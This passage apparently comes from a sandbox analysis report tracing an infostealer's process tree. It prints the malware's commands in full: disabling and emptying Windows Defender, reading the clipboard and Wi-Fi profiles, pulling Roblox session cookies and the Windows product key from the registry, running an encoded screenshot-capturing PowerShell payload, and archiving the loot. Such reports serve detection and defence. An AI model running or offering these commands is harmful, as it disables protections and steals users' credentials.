    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO0953AE28\Loader.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3672
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4912
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4436
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:5424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:536
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2800
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      Suspicious use of WriteProcessMemory
      PID:3872
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5712
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2032
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:6064
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3844
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4100
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      Suspicious use of WriteProcessMemory
      PID:2424
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4564
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:3576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4180
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4764
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\r2epczfo\r2epczfo.cmdline"
        6⤵
        
        PID:4844
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14CB.tmp" "c:\Users\Admin\AppData\Local\Temp\r2epczfo\CSC7B97E7FF977D4C2DA3ED4A9C91C6BAD8.TMP"
        7⤵
        
        PID:1344
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5988
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5564
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5968
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5236
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3664
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3580
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:632
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6140
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3796
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5980
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5112
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:2192
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:5608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI3922\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\lyOqF.zip" *"
      4⤵
      PID:2160
    - - C:\Users\Admin\AppData\Local\Temp\_MEI3922\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI3922\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\lyOqF.zip" *
        5⤵
        Executes dropped EXE
        
        PID:872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:2112
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1084
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:3260
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:4736
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:5704
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:3884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3828
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:928
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1996
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:4588
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5568
- C:\Users\Admin\AppData\Local\Temp\7zO095CC618\Loader.exe
  "C:\Users\Admin\AppData\Local\Temp\7zO095CC618\Loader.exe"
  2⤵
  - Executes dropped EXE
  PID:5536
- - C:\Users\Admin\AppData\Local\Temp\7zO095CC618\Loader.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO095CC618\Loader.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO095CC618\Loader.exe'"
      4⤵
      PID:1832
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zO095CC618\Loader.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2460
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:4104
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3472
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:2864
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4480
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5592
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4940
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:3248
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:1608
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:3816
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        Suspicious behavior: EnumeratesProcesses
        
        PID:872
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:6124
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4416
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2420
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2160
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1836
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:5260
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:5784
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:4884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgA